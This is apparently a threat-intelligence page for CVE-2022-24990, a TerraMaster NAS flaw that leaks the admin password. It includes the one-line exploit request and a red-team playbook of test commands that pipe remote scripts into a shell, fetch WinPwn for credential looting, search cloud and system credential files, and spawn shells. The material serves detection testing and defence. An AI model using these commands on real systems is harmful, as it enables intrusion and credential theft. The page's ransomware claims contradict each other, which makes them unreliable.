CVE-2022-24990

HIGH CISA KEV EXPLOIT POC TTE Zero-Day Pub 07/02 Upd 21/10

Overview

This vulnerability is an information disclosure flaw caused by improper access control in the TerraMaster NAS operating system (TOS) version 4.2.29 and earlier. The root cause lies in the unauthenticated exposure of sensitive configuration data via a specific API endpoint. The affected component is the web-based module/api.php interface, which processes requests containing a particular User-Agent header to retrieve administrative credentials.

Vulnerability Description

TerraMaster NAS 4.2.29 and earlier allows remote attackers to discover the administrative password by sending "User-Agent: TNAS" to module/api.php?mobile/webNasIPS and then reading the PWD field in the response.

Impact

An unauthenticated remote attacker can retrieve the administrative password of the TerraMaster NAS device by exploiting this vulnerability. No prior access or user interaction is required to perform the attack. With the administrative credentials exposed, the attacker can gain full control over the device, enabling unauthorized access to stored data, configuration changes, and potential lateral movement within the network. This leads to a complete compromise of the affected NAS system and exposure of sensitive information.

Solution

Upgrade TerraMaster NAS devices to version 4.2.30 or later, as this version addresses the authentication bypass vulnerability in the module/api.php endpoint. Refer to the official TerraMaster forum and vendor security advisories for detailed patch instructions. Additionally, monitor the Broadcom Security Center and projectdiscovery/nuclei-templates repository for updated detection and mitigation guidance.

EPSS vs KEV Prediction — Evolution (30 days)

Full Analysis

The vulnerability in the TerraMaster NAS operating system, specifically in versions 4.2.29 and earlier, arises from improper handling of user input in the API endpoint. By sending a specially crafted request with the "User-Agent: TNAS" header to the module/api.php?mobile/webNasIPS endpoint, an attacker can elicit a response that inadvertently reveals the administrative password stored in the PWD field. This flaw highlights a critical oversight in input validation and response management, as sensitive information is exposed without adequate authentication or authorization checks. The lack of security measures to obfuscate or encrypt the password further exacerbates the risk, allowing attackers to exploit this vulnerability with minimal effort.

Exploitation of this vulnerability can occur remotely, making it particularly concerning for organizations that rely on TerraMaster NAS devices for data storage and management. An attacker could leverage this weakness to gain unauthorized access to the administrative interface of the NAS, subsequently allowing them to manipulate settings, access sensitive data, or even deploy further attacks within the network. Scenarios could include an attacker targeting a specific organization known to use TerraMaster devices, or broader scans for vulnerable systems across the internet. Once the administrative password is obtained, the attacker could potentially pivot to other systems, escalating their access and impact.

The real-world implications of this vulnerability are significant, particularly for businesses that store sensitive information on their NAS devices. The exposure of administrative credentials can lead to data breaches, loss of intellectual property, and potential regulatory repercussions depending on the nature of the data compromised. Additionally, the reputational damage that could result from a successful attack can have long-lasting effects on customer trust and brand integrity. Organizations may face financial losses due to remediation efforts, legal fees, and potential fines imposed by regulatory bodies for failing to protect sensitive data adequately.

To detect and mitigate this vulnerability, organizations should implement several strategies. First, it is crucial to conduct regular security assessments and vulnerability scans to identify any instances of the affected TerraMaster NAS operating systems within the network. Monitoring network traffic for unusual patterns, such as requests to the vulnerable API endpoint, can also help identify potential exploitation attempts. Additionally, organizations should ensure that they are running the latest version of the TerraMaster operating system, as updates may include patches that address this vulnerability. Implementing network segmentation can further limit the exposure of NAS devices to the internet, reducing the attack surface.

In conclusion, the vulnerability present in the TerraMaster NAS operating system represents a significant risk to organizations utilizing this technology. The ease of exploitation and the potential for severe consequences necessitate immediate attention from cybersecurity teams. By adopting proactive detection and mitigation strategies, organizations can better safeguard their sensitive data and maintain the integrity of their IT infrastructure. Continuous monitoring and timely updates will be essential in defending against this and similar vulnerabilities in the future.




The CVSS score for CVE-2022-24990 has been revised upward from 7.5 to 9.8, reflecting a reassessment of the vulnerability’s criticality based on emerging evidence. This change coincides with the inclusion of the vulnerability in the Known Exploited Vulnerabilities (KEV) catalog, underscoring its active exploitation in the wild, including documented use by ransomware operators. CSURFACE threat intelligence has identified a steady presence of multiple publicly available proof-of-concept exploits, which lowers the barrier for adversaries to weaponize this flaw. Although the EPSS score remains stable at a high level, the KEV listing and ransomware association elevate the urgency for defenders to prioritize detection and response efforts. This recalibration signals that the threat posed by CVE-2022-24990 is both imminent and severe, increasing the likelihood of compromise in environments running vulnerable TerraMaster OS versions. Consequently, the overall risk rating for this vulnerability should be considered critical, with a heightened potential for impactful exploitation campaigns targeting exposed assets.



Update 2 — June 07, 2026

CSURFACE threat intelligence has detected a marked escalation in exploitation attempts targeting CVE-2022-24990, with telemetry indicating a significant uptick in adversary activity leveraging this vulnerability. This surge coincides with the emergence of multiple new proof-of-concept exploits publicly available on GitHub, broadening the attack surface and lowering the barrier to weaponization. The continued association of this vulnerability with ransomware operations underscores its attractiveness to threat actors seeking initial access or lateral movement within TerraMaster NAS environments. Although the EPSS score remains stable at an elevated level, the qualitative increase in detection frequency and exploit availability amplifies the urgency for defenders to monitor and respond to potential intrusions. Consequently, the threat level for CVE-2022-24990 should be reassessed as increasingly critical, reflecting both the heightened likelihood of exploitation and the expanding toolkit adversaries possess to capitalize on this flaw.



Update 3 — June 15, 2026

CSURFACE threat intelligence has detected a modest increase in activity related to CVE-2022-24990, with our telemetry indicating a slight rise in exploitation attempts targeting TerraMaster NAS devices. Despite a marginal decline in the EPSS score, the sustained presence of multiple publicly available proof-of-concept exploits continues to lower the barrier for adversaries, including ransomware operators, to leverage this vulnerability. This subtle uptick in detection frequency, combined with the persistent availability of exploit code, signals that threat actors remain actively interested in this flaw for initial access or lateral movement. Consequently, the threat level for CVE-2022-24990 remains critically high, underscoring the ongoing risk posed to affected environments and the necessity for vigilant monitoring.



Update 4 — July 05, 2026

CSURFACE threat intelligence has identified a marked escalation in detection activity related to CVE-2022-24990, indicating increased adversary engagement with this vulnerability. Although the official CVSS score has been revised downward to 7.5, reflecting a recalibration of the vulnerability’s impact parameters, the practical risk remains elevated due to the sustained availability of multiple proof-of-concept exploits and the integration of this flaw into automated attack frameworks, including Metasploit modules. Our telemetry confirms that threat actors, including ransomware affiliates, continue to leverage this vulnerability as a vector for initial access and lateral movement within TerraMaster NAS environments. The slight surge in exploitation attempts underscores persistent attacker interest and suggests that the vulnerability remains a viable target in the wild. Consequently, despite the CVSS adjustment, the overall threat level should be considered critically high, as the operational exploitation landscape has not diminished and may in fact be intensifying.



Update 5 — August 02, 2026

CSURFACE threat intelligence has identified a modest increase in exploitation attempts targeting CVE-2022-24990, reflecting sustained adversary interest despite a slight decline in the EPSS score. This persistence is underscored by the continued availability and dissemination of multiple proof-of-concept exploits on public repositories, which lowers the barrier for threat actors, including ransomware affiliates, to leverage this vulnerability for initial access and lateral movement within TerraMaster NAS environments. While the uptick in detection activity is not dramatic, it signals that the vulnerability remains actively targeted and operationally relevant. Consequently, defenders should recognize that the threat landscape surrounding CVE-2022-24990 remains dynamic and that the risk level continues to warrant a high priority designation due to ongoing exploitation potential and the involvement of financially motivated threat groups.

Affected Products (1)

Vendor Product Version CPE
terra-master Terra-Master Terramaster Operating System All cpe:2.3:o:terra-master:terramaster_operating_system:*:*:*:*:*:*:*:*
Warning: The exploits and proof-of-concept (PoC) code listed below are sourced from third-party public repositories. CSURFACE assumes no responsibility for the content, accuracy, or safety of these resources. Use at your own risk. Learn more

Metasploit (1)

Module Authors Rank Platform Link
TerraMaster TOS 4.2.29 or lower - Unauthenticated RCE chaining CVE-2022-24990 and CVE-2022-24989
exploits/linux/http/terramaster_unauth_rce_cve_2022_24990
- Unknown - View

GitHub PoCs (6)

Repository Author Stars Forks Date Link
lishang520/CVE-2022-24990
CVE-2022-24990信息泄露+RCE 一条龙
lishang520 38 16 2022-03-20 View
0xf4n9x/CVE-2022-24990
CVE-2022-24990 TerraMaster TOS unauthenticated RCE via PHP Object Instantiation
0xf4n9x 12 6 2022-03-20 View
VVeakee/CVE-2022-24990-POC
仅仅是poc,并不是exp
VVeakee 4 6 2022-03-10 View
ZZ-SOCMAP/CVE-2022-24990
TerraMaster TOS Unauthenticated Remote Command Execution(RCE) Vulnerability CVE-2022-24990
ZZ-SOCMAP 3 2 2022-04-12 View
jsongmax/terraMaster-CVE-2022-24990
jsongmax 4 0 2022-10-17 View
Jaky5155/CVE-2022-24990-TerraMaster-TOS--PHP-
CVE-2022-24990:TerraMaster TOS 通过 PHP 对象实例化执行未经身份验证的远程命令
Jaky5155 2 0 2022-03-08 View
Exploited in Wild CONFIRMED
Ransomware NOT ASSOCIATED
Attacker Interest MEDIUM
Sightings Few sightings

Threat Feed

33 events
2026-08-08
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-08-02
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-08-01
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-07-30
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-07-29
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-07-28
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-07-27
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-07-26
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-07-19
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-07-12
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-07-08
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-07-07
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-07-05
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-07-04
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-06-30
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-06-29
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-06-28
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-06-23
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-06-21
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-06-19
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-06-15
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-06-10
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-06-09
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-06-08
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-05-29
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-05-21
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-05-19
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-05-18
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-05-17
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-05-10
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2023-02-10
Added to CISA KEV Catalog

CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog

2022-03-08
PoC Published (6 GitHub repositories)

Proof-of-concept code is publicly available for this vulnerability

2022-03-07
Exploit Published (0 ExploitDB, 1 Metasploit)

Public exploit code is available for this vulnerability

Likely Kill Chain

Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.

Applicable Out of scope
Initial Access
TA0001
Execution
TA0002
Persistence
TA0003
Priv. Escalation
TA0004
Defense Evasion
TA0005
Credential Access
TA0006
Lateral Movement
TA0008
Collection
TA0009
Impact
TA0040

Kill chain derived from the ML classifier.

Attack Vectors ML

Authentication Bypass
100% auth_bypass
Privilege Escalation
35% privilege_escalation

MITRE ATT&CK Techniques (6)

The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.

ID Name Stage Tactics Platforms Link
T1190 Exploit Public-Facing Application Initial Access initial-access Containers, ESXi, IaaS, Linux, macOS, Network Devices, Windows
T1059.004 Unix Shell Kill Chain execution ESXi, Linux, macOS, Network Devices
T1505.003 Web Shell Kill Chain persistence Linux, macOS, Network Devices, Windows
T1552.001 Credentials In Files Kill Chain credential-access Containers, IaaS, Linux, macOS, Windows
T1049 System Network Connections Discovery Kill Chain discovery Windows, IaaS, Linux, macOS, Network Devices, ESXi
T1021.004 SSH Kill Chain lateral-movement ESXi, Linux, macOS

CAPEC Attack Patterns ML

ID Name ML Conf. Likelihood Severity Link
CAPEC-166 Force the System to Reset Values
31%
Medium
CAPEC-12 Choosing Message Identifier
30%
High High
CAPEC-216 Communication Channel Manipulation
30%
CAPEC-36 Using Unpublished Interfaces or Functionality
30%
Medium High
CAPEC-62 Cross Site Request Forgery
30%
High Very High

Red Team Playbook

44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.

T1021.004 ESXi - Enable SSH via PowerCLI Windows PowerShell Privileged
An adversary enables the SSH service on a ESXi host to maintain persistent access to the host and to carryout subsequent operations.
Command (PowerShell)
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false 
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
T1021.004 ESXi - Enable SSH via VIM-CMD Windows CMD
An adversary enables SSH on an ESXi host to maintain persistence and creeate another command execution interface. [Reference](https://lolesxi-project.github.io/LOLESXi/lolesxi/Binaries/vim-cmd/#enable%20service)
Command (CMD)
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
T1049 System Discovery using SharpView Windows PowerShell Privileged
Get a listing of network connections, domains, domain users, and etc. sharpview.exe located in the bin folder, an opensource red-team tool. Upon successful execution, cmd.exe will execute sharpview.exe <method>. Results will output via stdout.
Command (PowerShell)
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
T1049 System Network Connections Discovery Windows CMD
Get a listing of network connections. Upon successful execution, cmd.exe will execute `netstat`, `net use` and `net sessions`. `net sessions` requires elevated privileges; on standard user accounts this command may not return results. Results will output via stdout.
Command (CMD)
netstat -ano
net use
net sessions 2>nul
T1049 System Network Connections Discovery FreeBSD, Linux & MacOS Linux, macOS Shell
Get a listing of network connections. Upon successful execution, sh will execute `netstat` and `who -a`. Results will output via stdout.
Command (Shell)
netstat
who -a
T1049 System Network Connections Discovery via PowerShell (Process Mapping) Windows PowerShell
Enumerate TCP connections and map to owning process names via PowerShell.
Command (PowerShell)
Get-NetTCPConnection | ForEach-Object {
  $p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
  [pscustomobject]@{
    Local   = "$($_.LocalAddress):$($_.LocalPort)"
    Remote  = "$($_.RemoteAddress):$($_.RemotePort)"
    State   = $_.State
    PID     = $_.OwningProcess
    Process = if ($p) { $p.ProcessName } else { $null }
  }
} | Sort-Object State,Process | Format-Table -AutoSize
T1049 System Network Connections Discovery via sockstat (Linux, FreeBSD) Linux Shell
Enumerate IPv4/IPv6 network endpoints on FreeBSD using sockstat.
Command (Shell)
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
T1049 System Network Connections Discovery via ss or lsof (Linux/MacOS) Linux, macOS Bash
List active TCP/UDP network connections using ss, with lsof as a fallback when ss is unavailable. Serves as an alternative to the netstat-based test.
Command (Bash)
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
T1049 System Network Connections Discovery with PowerShell Windows PowerShell
Get a listing of network connections. Upon successful execution, powershell.exe will execute `get-NetTCPConnection`. Results will output via stdout.
Command (PowerShell)
Get-NetTCPConnection
T1059.004 Change login shell Linux Bash Privileged
An adversary may want to use a different login shell. The chsh command changes the user login shell. The following test, creates an art user with a /bin/bash shell, changes the users shell to sh, then deletes the art user.
Command (Bash)
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
T1059.004 Command line scripts Linux Shell
An adversary may type in elaborate multi-line shell commands into a terminal session because they can't or don't wish to create script files on the host. The following command is a simple loop, echoing out Atomic Red Team was here!
Command (Shell)
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
T1059.004 Command-Line Interface Linux, macOS Shell
Using Curl to download and pipe a payload to Bash. NOTE: Curl-ing to Bash is generally a bad idea if you don't control the server. Upon successful execution, sh will download via curl and wget the specified payload (echo-art-fish.sh) and set a marker file in `/tmp/art-fish.txt`.
Command (Shell)
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
T1059.004 Create and Execute Bash Shell Script Linux, macOS Shell
Creates and executes a simple sh script.
Command (Shell)
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
T1059.004 Creating shell using cpan command Linux, macOS Shell
cpan lets you execute perl commands with the ! command. It can be used to break out from restricted environments by spawning an interactive system shell. Reference - https://gtfobins.github.io/gtfobins/cpan/
Command (Shell)
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1  cpan
T1059.004 Current kernel information enumeration Linux Shell
An adversary may want to enumerate the kernel information to tailor their attacks for that particular kernel. The following command will enumerate the kernel information.
Command (Shell)
uname -srm
T1059.004 Detecting pipe-to-shell Linux Shell
An adversary may develop a useful utility or subvert the CI/CD pipe line of a legitimate utility developer, who requires or suggests installing their utility by piping a curl download directly into bash. Of-course this is a very bad idea. The adversary may also take advantage...
Command (Shell)
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt      
T1059.004 Environment variable scripts Linux Shell
An adversary may place scripts in an environment variable because they can't or don't wish to create script files on the host. The following test, in a bash shell, exports the ART variable containing an echo command, then pipes the variable to /bin/bash
Command (Shell)
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
T1059.004 Harvest SUID executable files Linux Shell
AutoSUID application is the Open-Source project, the main idea of which is to automate harvesting the SUID executable files and to find a way for further escalating the privileges.
Command (Shell)
chmod +x #{autosuid}
bash #{autosuid}
T1059.004 LinEnum tool execution Linux Shell
LinEnum is a bash script that performs discovery commands for accounts,processes, kernel version, applications, services, and uses the information from these commands to present operator with ways of escalating privileges or further exploitation of targeted host.
Command (Shell)
chmod +x #{linenum}
bash #{linenum}
T1059.004 New script file in the tmp directory Linux Shell
An attacker may create script files in the /tmp directory using the mktemp utility and execute them. The following commands creates a temp file and places a pointer to it in the variable $TMPFILE, echos the string id into it, and then executes the file using bash, which...
Command (Shell)
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
T1059.004 Obfuscated command line scripts Linux Shell
An adversary may pre-compute the base64 representations of the terminal commands that they wish to execute in an attempt to avoid or frustrate detection. The following commands base64 encodes the text string id, then base64 decodes the string, then pipes it as a command to...
Command (Shell)
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
T1059.004 Shell Creation using awk command Linux, macOS Shell
In awk the begin rule runs the first record without reading or interpreting it. This way a shell can be created and used to break out from restricted environments with the awk command. Reference - https://gtfobins.github.io/gtfobins/awk/#shell
Command (Shell)
awk 'BEGIN {system("/bin/sh &")}'
T1059.004 Shell Creation using busybox command Linux Shell
BusyBox is a multi-call binary. A multi-call binary is an executable program that performs the same job as more than one utility program. It can be used to break out from restricted environments by spawning an interactive system shell. Reference -...
Command (Shell)
busybox sh &
T1059.004 What shell is running Linux Shell
An adversary will want to discover what shell is running so that they can tailor their attacks accordingly. The following commands will discover what shell is running.
Command (Shell)
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
T1059.004 What shells are available Linux Shell
An adversary may want to discover which shell's are available so that they might switch to that shell to tailor their attacks to suit that shell. The following commands will discover what shells are available on the host.
Command (Shell)
cat /etc/shells 
T1059.004 emacs spawning an interactive system shell Linux, macOS Shell Privileged
emacs can be used to break out from restricted environments by spawning an interactive system shell. Ref: https://gtfobins.github.io/gtfobins/emacs/
Command (Shell)
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
T1505.003 Web Shell Written to Disk Windows CMD
This test simulates an adversary leveraging Web Shells by simulating the file modification to disk. Idea from APTSimulator. cmd.aspx source - https://github.com/tennc/webshell/blob/master/fuzzdb-webshell/asp/cmd.aspx
Command (CMD)
xcopy /I /Y "#{web_shells}" #{web_shell_path}
T1552.001 Access unattend.xml Windows CMD Privileged
Attempts to access unattend.xml, where credentials are commonly stored, within the Panther directory where installation logs are stored. If these files exist, their contents will be displayed. They are used to store credentials/answers during the unattended windows install process.
Command (CMD)
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
T1552.001 Extract Browser and System credentials with LaZagne macOS Bash Privileged
[LaZagne Source](https://github.com/AlessandroZ/LaZagne)
Command (Bash)
python2 laZagne.py all
T1552.001 Extract passwords with grep Linux, macOS Shell
Extracting credentials from files
Command (Shell)
grep -ri password #{file_path}
exit 0
T1552.001 Extracting passwords with findstr Windows PowerShell
Extracting Credentials from Files. Upon execution, the contents of files that contain the word "password" will be displayed.
Command (PowerShell)
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
T1552.001 Find AWS credentials Linux, macOS Shell
Find local AWS credentials from file, defaults to using / as the look path.
Command (Shell)
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
T1552.001 Find Azure credentials Linux, macOS Shell
Find local Azure credentials from file, defaults to using / as the look path.
Command (Shell)
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
T1552.001 Find GCP credentials Linux, macOS Shell
Find local Google Cloud Platform credentials from file, defaults to using / as the look path.
Command (Shell)
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
T1552.001 Find OCI credentials Linux, macOS Shell
Find local Oracle cloud credentials from file, defaults to using / as the look path.
Command (Shell)
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
T1552.001 Find and Access Github Credentials Linux, macOS Bash
This test looks for .netrc files (which stores github credentials in clear text )and dumps its contents if found.
Command (Bash)
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
T1552.001 List Credential Files via Command Prompt Windows CMD Privileged
Via Command Prompt,list files where credentials are stored in Windows Credential Manager
Command (CMD)
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
T1552.001 List Credential Files via PowerShell Windows PowerShell Privileged
Via PowerShell,list files where credentials are stored in Windows Credential Manager
Command (PowerShell)
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
T1552.001 WinPwn - Loot local Credentials - AWS, Microsoft Azure, and Google Compute credentials Windows PowerShell
Loot local Credentials - AWS, Microsoft Azure, and Google Compute credentials technique via function of WinPwn
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive  
T1552.001 WinPwn - SessionGopher Windows PowerShell
Launches SessionGopher on this system via WinPwn
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
T1552.001 WinPwn - Snaffler Windows PowerShell
Check Domain Network-Shares for cleartext passwords using Snaffler function of WinPwn
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
T1552.001 WinPwn - passhunt Windows PowerShell
Search for Passwords on this system using passhunt via WinPwn
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
T1552.001 WinPwn - powershellsensitive Windows PowerShell
Check Powershell event logs for credentials or other sensitive information via winpwn powershellsensitive function.
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
T1552.001 WinPwn - sensitivefiles Windows PowerShell
Search for sensitive files on this local system using the SensitiveFiles function of WinPwn
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput

Detection & Response Rules

No detection or response rules found for this CVE.

No news articles found for this CVE.

References (7)

Title Tags URL
nvd.nist.gov
NVD reference
https://nvd.nist.gov/vuln/detail/CVE-2022-24990
forum.terra-master.com
GitHub CVE
https://forum.terra-master.com/en/viewforum.php?f=28
broadcom.com
GitHub CVE
https://www.broadcom.com/support/security-center/attacksignatures/detail?asid=33732
github.com
GitHub CVE
https://github.com/0xf4n9x/CVE-2022-24990
octagon.net
GitHub CVE
https://octagon.net/blog/2022/03/07/cve-2022-24990-terrmaster-tos-unauthenticated-remote-command-execution-via-php-object-instantiation/
packetstormsecurity.com
GitHub CVE
http://packetstormsecurity.com/files/172904/TerraMaster-TOS-4.2.29-Remote-Code-Execution.html
cisa.gov
NVD API US Government Resource
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2022-24990